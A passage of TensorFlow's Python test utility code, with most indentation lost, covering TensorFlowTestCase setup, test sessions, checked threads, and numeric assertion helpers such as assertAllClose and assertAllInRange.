pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
# Check if the mlir bridge has been explicitly enabled or disabled. If
    # is_mlir_bridge_enabled() returns None, the user did not explicitly enable
# or disable the bridge so do not update enable_mlir_bridge.
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
elif is_mlir_bridge_enabled() is not None:
context.context().enable_mlir_bridge = False
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
# This flag provides the ability to control whether the graph mode gets
# initialized for TF1 or not. Initializing for TF1, which is what was
# happening earlier, was preventing enablement of 'eager mode' in the test.
self._set_default_seed = True
def setUp(self):
super(TensorFlowTestCase, self).setUp()
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
if self._set_default_seed:
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
    # Reset summary writer in case another test used set_as_default() with its
    # summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
    # Avoid calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that across different runs tests will not be able
    to pollute each other's environment.
    If you need multiple unique directories within a single test, you should
    use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
  def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
    """Asserts that message is the same as parsed expected_message_ascii.
    Creates another prototype of message, reads the ascii message into it and
    then compares them using self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, indexed_slices.IndexedSlices):
return indexed_slices.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
      tensors' numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=True, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session():
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
    This method behaves differently from self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session() as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
      This method returns True from just before the run() method starts
      until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tf_type(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def evaluate_if_both_tensors(self, a, b):
if (tensor_util.is_tf_type(a) and tensor_util.is_tf_type(b) and
not isinstance(a, ops._EagerTensorBase) and
not isinstance(b, ops._EagerTensorBase)):
return self.evaluate((a, b))
else:
return (a, b)
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
# np.allclose does not always work for our custom bfloat16 extension type
# when type promotions are involved, so we first cast any bfloat16 arrays
# to float32.
a_dtype = a.dtype
a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if that does not work, then
      # traverse through the sequence, which is more expensive.
try:
(a, b) = self.evaluate_if_both_tensors(a, b)
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError, NotImplementedError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
  def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    """Asserts that two structures of numpy arrays or Tensors have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
    In particular, the tolerances are relaxed to 1e-3 if at least
    one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
    If limit == N, this method will print up to the first N subscripts on
    separate lines. A line of ellipses (...) will be appended at the end if the
    number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
